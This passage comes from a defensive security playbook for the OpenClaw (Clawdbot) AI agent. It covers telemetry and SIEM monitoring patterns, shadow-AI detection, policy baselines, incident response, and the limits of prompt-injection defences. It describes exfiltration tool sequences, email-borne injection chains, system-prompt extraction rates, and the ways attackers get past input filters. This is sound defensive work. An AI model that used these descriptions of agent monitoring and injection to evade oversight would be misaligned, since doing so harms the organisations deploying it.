jsonl:
path: "~/.openclaw/logs/telemetry.jsonl"
rotation: "daily"
syslog:
enabled: true
host: "siem.company.com"
port: 514
protocol: "tcp"
format: "cef" # Common Event Format for SIEM parsing
redaction:
enabled: true
patterns:
- "api[_-]?key"
- "token"
- "password"
- "secret"
This enables centralized analysis across all AI agent deployments, with correlation to other security events.
What to Monitor
High-risk tool execution patterns:
exec,shell,python_repltools executed outside normal working hoursFile reads targeting sensitive paths (
~/.ssh,~/.aws, credential files)Email/message sends to external domains not in whitelist
Browser automation accessing internal dashboards
Unusual command sequences (e.g.,
file_read→base64_encode→http_post= potential exfiltration)
Temporal anomalies:
Tool execution when user is not active (keyboard/mouse idle)
Burst activity (10+ tool calls in <1 minute)
Execution during maintenance windows or known-offline periods
Data pattern anomalies:
Large file reads (potential credential harvesting)
Base64-encoded blobs in outputs (obfuscation attempts)
Suspicious recipients in email/Slack/Discord tools
URLs pointing to non-whitelisted domains
These monitoring patterns form the behavioral baseline you need before deploying active detection. Once openclaw-telemetry is running and forwarding to your SIEM, Part 3 operationalizes all of the above into ready-to-deploy queries.
Specifically, Part 3 provides:
Tier 2 behavioral hunting queries for every anomaly pattern listed above — credential path reads, off-hours execution, burst tool sequences, and SOUL.md modification alerts — formatted for CrowdStrike Falcon, Microsoft Defender for Endpoint, Cortex XDR, SentinelOne, and Splunk
Tier 3 kill chain detection mapping observed tool sequences to MITRE ATLAS attack chains, so your SOC can identify which attack scenario is in progress, not just that something is anomalous
YARA rules for credential path enumeration, dangerous skill patterns, and SOUL.md injection persistence
verify_hash_chain.pyto validate the tamper-proof hash chain in your telemetry logs and confirm whether evidence has been modified
→ Part 3: Detection and Threat Hunting — deploy these queries after completing Layers 1-6.
Layer 7: Organizational Security Controls
Framework mapping: NIST CSF ID.AM (Asset Management), RS (Response)
Problem
Shadow AI deployment - users installing agents without IT approval - creates blind spots in security monitoring. An estimated 300,000-400,000 Clawdbot users deployed without security review. You cannot secure what you don't know exists.
Goal
Discovery mechanisms detect all AI agent installations across managed endpoints. Centralized policy enforcement ensures consistent security baselines. Incident response procedures handle agent-specific compromise scenarios.
Production Shadow AI Discovery: openclaw-detect
openclaw-detect (Knostic) provides enterprise-ready detection scripts deployable via MDM platforms:
# Download detection script for your platform
# macOS/Linux
curl -O https://raw.githubusercontent.com/knostic/openclaw-detect/main/detect-openclaw.sh
less detect-openclaw.sh # Review before executing
chmod +x detect-openclaw.sh
./detect-openclaw.sh
# Windows (PowerShell)
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/knostic/openclaw-detect/main/detect-openclaw.ps1" -OutFile "detect-openclaw.ps1"
# Review: notepad detect-openclaw.ps1
powershell -ExecutionPolicy Bypass -File ./detect-openclaw.ps1
What it detects:
CLI binaries (
openclaw,moltbot,clawdbotcommands)App bundles (macOS .app packages)
Configuration files (
~/.openclaw/,~/.moltbot/,~/.clawdbot/)Gateway services (running processes on port 18789)
Docker containers with agent images
Browser extensions and IDE plugins
MDM deployment documentation included for:
Microsoft Intune
Jamf Pro
JumpCloud
Kandji
VMware Workspace ONE
This enables automated scanning across all managed endpoints with centralized reporting.
→ View openclaw-detect with complete detection scripts and MDM deployment guides.
→ MDM deployment documentation for Intune, Jamf, JumpCloud, Kandji, and Workspace ONE.
Beyond endpoint-level detection, you should inventory hidden AI agents across your entire environment. The ai-bom CLI scans source code, Docker and cloud IaC for LLM calls, MCP configuration files and hard-coded keys, generating a CycloneDX 1.6 inventory with risk ratings. It uses 13 specialised scanners and produces nine output formats. One command (ai-bom scan .) prints a risk-scored inventory or emits a SARIF report. Use ai-bom alongside endpoint agents to discover AI components hidden in infrastructure that might not be covered by MDM.
Centralized Policy Enforcement
Deploy security baselines to discovered agent installations:
# Organization-wide security policy
organization:
policy_version: "1.0"
enforcement: "strict"
mandatory_settings:
gateway:
bind:
address: "127.0.0.1" # All instances must bind to localhost
auth:
mode: "required"
loopback:
autoApprove: false
tools:
disabled:
- "exec" # Shell execution disabled org-wide
- "python_repl"
logging:
remote_syslog: "siem.company.com:514"
retention_days: 90
telemetry:
enabled: true
plugin: "openclaw-telemetry" # Mandate telemetry plugin
→ Browse organization policy templates: Department-specific policies, compliance mappings (SOC2, ISO 27001), audit configurations.
For teams requiring detailed auditability and governance, the deterministic-agent-control-protocol introduces a gateway that intercepts all agent actions, evaluates them against policies and logs every decision in a tamper-evident ledger. It supports bounded, reversible and session-aware actions, enforcing budgets and rate limits. While experimental, it offers a model for reversible execution and post-incident investigation.
Incident Response Playbook
When compromise is detected, execute these steps immediately:
Phase 1: Containment (0-15 minutes)
- Isolate the agent:
# Stop service immediately
systemctl stop moltbot
# OR for Docker: docker stop clawdbot
- Block network access:
# Linux (requires root):
iptables -A OUTPUT -m owner --uid-owner clawdbot -j DROP
# macOS/Windows: Isolate host from network at control plane
# Or use your EDR/firewall policy
- Preserve logs:
tar czf incident_logs_$(date +%s).tar.gz ~/.moltbot/logs/
cp ~/.moltbot/logs/ ~/incident-$(date +%Y%m%d-%H%M%S)/
- Alert security team via established channels
Phase 2: Investigation (15-60 minutes)
Review tool execution logs for malicious activity
Check credential access audit logs:
macOS: Open Keychain Access.app, check access logs
Linux:
journalctl | grep "Secret Service"
Identify compromised credentials
Document attack timeline and indicators of compromise (IOCs)
Check openclaw-telemetry hash chains for evidence of log tampering
Phase 3: Remediation (1-4 hours)
Rotate all credentials accessed by the agent
Review and approve all installed skills
Apply security baseline configuration
Deploy openclaw-shield for runtime protection
Restart agent in isolated test environment
Monitor for 24 hours before returning to production
→ Complete incident response playbook with forensic analysis procedures, communication templates, and post-incident review.
→ Incident reporting template for documentation and stakeholder communication.
What Nobody Discusses: Hard Problems
Some security challenges have no perfect solutions. Understanding limitations helps set realistic expectations.
The Prompt Injection Paradox
The problem: Models fundamentally cannot distinguish "attacker instruction" from "legitimate user instruction" because both are natural language with equal semantic validity.
What doesn't work:
Input filtering (attackers use encoding, obfuscation, hidden text)
Separate system prompts (84.6% extraction rate in ZeroLeaks testing)
Model-based validation (creates second model to attack)
Adversarial training (improves resistance but doesn't eliminate vulnerability)
Pragmatic mitigations that reduce risk:
Reduce attack surface (disable untrusted input channels like email, Twitter)
Limit tool capabilities (can't exfiltrate what you can't access)
Require human confirmation (breaks automated exploitation chains)
Monitor for anomalies (detect successful attacks through behavior)
Deploy runtime guards (openclaw-shield, clawguard block execution)
Accept reality: You cannot prevent all prompt injection. Build systems that limit damage when it occurs - that's what Layers 3, 4, and 6 accomplish.
The Convenience vs. Security Trade-off
The tension: Every security control reduces usability.
OS Keychain: Adds authorization prompts
VPN: Requires additional client software
Container sandboxing: Complicates local development
Tool confirmation: Interrupts workflow
Skill vetting: Slows feature adoption
Runtime security plugins: May impact performance
Decision framework:
High-value targets (production, contains sensitive data):
Accept usability cost
Implement all seven defense layers
Require security review for changes
Deploy openclaw-shield + openclaw-telemetry
Low-value targets (personal projects, public data only):
Reduce controls to match risk
Implement layers 1-3 minimum
Document remaining risk acceptance
Development environments:
Use separate instances with relaxed controls
Never connect to production systems
Clear separation between dev and prod credentials
The Shared Responsibility Model
Your responsibilities:
Secure the agent deployment (network, credentials, containers)
Vet and monitor skills
Implement defense-in-depth
Respond to incidents
LLM provider responsibilities (Anthropic, OpenAI):
Secure model infrastructure
Prevent training data leakage
Implement safety guardrails
Provide security tooling
What falls between the cracks:
Model misbehavior due to adversarial inputs
Emergent capabilities exploited by attackers
Skill ecosystem security (no central vetting for third-party skills)
Cross-agent attack vectors (one compromised agent attacks others on same network)
Pragmatic approach: Assume the model can be manipulated. Build controls that work even when the model is adversarial - that's the core principle of this 7-layer defense architecture.
Reality Check: Security vs. Usability
Implementing all seven defense layers creates friction. Here's how to balance security with operational needs.
Recommended Configurations by Risk Profile
High Security (Enterprise Production)
# Maximum security - accept usability cost
layers_enabled:
- OS_credential_isolation: true # Layer 1
- VPN_only_access: true # Layer 2
- Container_sandboxing: true # Layer 3
- Runtime_security_enforcement: true # Layer 4 (openclaw-shield)
- Supply_chain_monitoring: true # Layer 5
- Behavioral_telemetry: true # Layer 6 (openclaw-telemetry)
- Centralized_policy_enforcement: true # Layer 7
tools:
disabled: ["exec", "python_repl", "shell"]
require_confirmation: ["email_send", "browser_action", "file_write"]
monitoring:
telemetry_plugin: "openclaw-telemetry"
log_retention: 90_days
real_time_alerts: true
siem_integration: true
Balanced (Team Deployment)
# Balance security and usability
layers_enabled:
- OS_credential_isolation: true # Layer 1
- VPN_only_access: true # Layer 2
- Runtime_security_enforcement: true # Layer 4 (Prompt Guard only)
- Supply_chain_monitoring: true # Layer 5
- Basic_logging: true # Layer 6 (basic)
tools:
disabled: ["exec", "python_repl"]
require_confirmation: ["email_send"]
monitoring:
log_retention: 30_days
daily_review: true
Development (Local Testing)
# Minimal controls for development
layers_enabled:
- OS_credential_isolation: false # Use test credentials
- Localhost_binding: true # Layer 2 (partial)
- Basic_logging: true
tools:
allow_all: true # Full capabilities for testing
network:
isolated: true # Cannot reach production systems
→ Browse complete configuration examples for different deployment scenarios with security-usability trade-off analysis.
→ View openclaw-shield + openclaw-telemetry integration showing combined deployment of community security tools.
April 2026 — DefenseClaw observability: If you deploy DefenseClaw, it emits all enforcement events as structured JSON logs and ships with a one-command Splunk setup (local or cloud Splunk) plus a pre-built DefenseClaw Splunk app with dashboards, saved searches, and investigation workflows. The event schema includes
dc_block(enforcement action taken) anddc_codeguard(code scan result) events that complement thetool_executedevents from openclaw-telemetry.In Part 3's behavioral hunting queries, these DefenseClaw events are particularly valuable for Kill Chain 1 (Injection → RCE): a
dc_codeguardblock event on apython_replcall in the same session as an inbound email message is near-zero false positive evidence of an active attack attempt.# One-command local Splunk setup (from DefenseClaw repo) defenseclaw observability setup-splunk --mode local # Deploys Splunk container + DefenseClaw app with pre-built dashboards→ DefenseClaw observability setup for Splunk configuration and event schema reference.
Independent benchmarks show that agent-security tools perform very differently: in a recent study, composite scores ranged from 38 to 98, and the highest-scoring tools still detected only ~9–17 % of unauthorized tool-abuse calls. Include this evidence when choosing a tool and emphasize that injection detection alone is insufficient.
Production Deployment Checklist
Before moving to production, verify all controls are in place:
Layer 1: Credentials
[ ] All API keys migrated to OS Keychain/Secret Service
[ ] No plaintext credentials in filesystem (
grep -r "api_key" ~/.moltbot/ 2>/dev/nullreturns no keys)[ ] Backup files securely deleted
[ ] Touch ID enabled for high-value credentials (optional)
[ ] Credential access audit logs configured and tested
Layer 2: Network
[ ] Gateway bound to localhost only (
127.0.0.1:18789viass -lntp)[ ] VPN deployed (Tailscale or WireGuard)
[ ] ACLs configured for device allowlisting
[ ] Firewall rules prevent port 18789 exposure
[ ] No reverse proxy configuration in use
Layer 3: Runtime Sandboxing
[ ] Agent runs in hardened container
[ ] All capabilities dropped except required (
--cap-drop ALL)[ ] Read-only filesystem configured (
--read-only)[ ] Volume mounts use least-privilege (
:rowhere possible)[ ] Sensitive directories excluded from mounts (
~/.ssh,~/.awsnot mounted)
Layer 4: Runtime Security Enforcement
[ ] openclaw-shield plugin installed (or clawguard for JS/TS)
[ ] Prompt Guard layer enabled
[ ] Output Scanner layer enabled
[ ] Tool Blocker configured with allowlist
[ ] Input Audit logging active
[ ] DefenseClaw installed with runtime inspection enabled (if running on OpenShell) - verify with
defenseclaw status[ ] DefenseClaw CodeGuard enabled for agent-generated code scanning
[ ] DefenseClaw set to
actionmode (notmonitormode) in production
Layer 5: Supply Chain
[ ] Skill manifest baseline generated and committed to version control
[ ] Daily integrity monitoring configured (cron job active)
[ ] Automatic skill updates disabled (
autoUpdate: false)[ ] Skill allowlist enforced
[ ] Version pinning for all installed skills
Layer 6: Behavioral Monitoring
[ ] openclaw-telemetry plugin installed
[ ] SIEM forwarding configured and tested
[ ] Hash chain validation enabled
[ ] Sensitive data redaction active
[ ] Real-time alerting configured for high-risk patterns
Layer 7: Organizational Controls
[ ] openclaw-detect deployed via MDM
[ ] Shadow AI inventory complete
[ ] Security policy documented and enforced
[ ] Incident response playbook ready
[ ] Security team trained on agent-specific threats
→ Download production deployment checklist in PDF format for team distribution.
Conclusion: Building Trustworthy AI Agents
The vulnerabilities affecting 1,200+ Clawdbot instances - backup file persistence, localhost authentication bypass, 91.3% prompt injection success - demonstrate that agentic AI security requires fundamentally different approaches than traditional application security.
Key takeaways:
Defense-in-depth is mandatory: Single-layer security fails against multi-vector attacks
Community tools accelerate security: openclaw-detect, openclaw-telemetry, openclaw-shield, and clawguard provide production-ready defenses
Assume breach at every layer: Build systems that limit damage when compromise occurs
OS-level isolation matters: Plaintext credential storage is indefensible against modern malware
Network segmentation works: VPNs eliminate entire classes of authentication bypass vulnerabilities
Runtime enforcement prevents exploitation: Security plugins block malicious tool calls before execution
Behavioral monitoring detects novel attacks: Static defenses fail against 91.3% prompt injection success rates
The path forward:
Start with immediate mitigations from Part 1 (fixes active exploitation)
Implement OS credential isolation within two weeks (defeats infostealer malware)
Deploy community security tools (openclaw-shield, openclaw-telemetry, openclaw-detect)
Deploy VPN and container sandboxing within one month (reduces blast radius)
Establish continuous monitoring and incident response (detects compromise)
No security architecture is perfect. The goal is raising attacker cost while maintaining operational value. These seven defense layers - credential isolation, network segmentation, runtime sandboxing, runtime security enforcement, supply chain integrity, behavioral monitoring, and organizational controls - transform AI agents from privilege escalation paths into hardened production systems.
Additional Resources
Implementation Guides
Quick start guide - 5-minute security wins
Credential isolation - OS Keychain migration
Network segmentation - VPN setup
Runtime sandboxing - Container security
Supply chain security - Skill vetting
Incident response - Compromise procedures
Community tools integration - Deployment guide
Tools and Scripts
Browse all security scripts - Production-ready automation
Configuration templates - Hardened configs
Deployment examples - Real-world scenarios
Community Security Tools
openclaw-detect - Shadow AI discovery via MDM deployment
openclaw-telemetry - Enterprise telemetry with SIEM integration
openclaw-shield - 5-layer defense-in-depth security plugin
clawguard - JavaScript/TypeScript prompt injection guards
OpenClaw-Skills-Security - Pre-install skill and environment auditing for malicious skills, risky permissions, dependency issues, and runtime misconfiguration
AgentGuard - Runtime interception and deep scanning for high-risk agent actions, sensitive file writes, secrets, and prompt-injection threats
ai-bom - AI asset discovery across code, Docker, and cloud IaC with CycloneDX inventory generation and risk scoring
IronCurtain - Credential brokering architecture that keeps real secrets out of the agent runtime through proxy-based policy enforcement
MCPHammer - Red-teaming tool for testing malicious MCP server abuse, data exfiltration, and MCP supply-chain risks
Deterministic Agent Control Protocol - Experimental gateway for policy-based agent action control, tamper-evident logging, and reversible execution
AgentShield Benchmark - Comparative benchmark for agent-security tools covering detection quality, tool-abuse coverage, and overall effectiveness
Original Security Research
Key citations for technical claims:
BrandDefense: "1,200+ Clawdbot Instances Exposed" (Jan 27, 2026)
Bitdefender: "Clawdbot Gateway Authentication Bypass" (Jan 28, 2026)
Jamieson O'Reilly: "Poisoning the Clawdbot Skill Library" (Jan 15, 2026)
OX Security: "Credential Backup Persistence in OpenClaw" (Jan 29, 2026)
Hudson Rock: "Infostealer Adaptation to Clawdbot Disclosure" (Jan 31, 2026)
ZeroLeaks: "Clawdbot Prompt Injection Testing Results" (Jan 30, 2026)
Zenity Labs: "7,922 Attack Attempts in 72 Hours" (Jan 29, 2026)
Snyk: "Email-Based Prompt Injection Against AI Agents" (Feb 1, 2026)
Intruder.io: "Social Media Vectors for Agent Compromise" (Feb 2, 2026)
Gadi Evron: "openclaw-detect and openclaw-telemetry Release" (LinkedIn, Feb 1, 2026)
Knostic: "openclaw-shield: Preventing Secret Leaks and Destructive Commands" (Blog, Feb 4, 2026)
Series Navigation:
Found this helpful? Star the repository and share with your security team to improve AI agent security across your organization.
Questions or contributions? Open a GitHub issue or submit a pull request to openclaw-security-playbook.



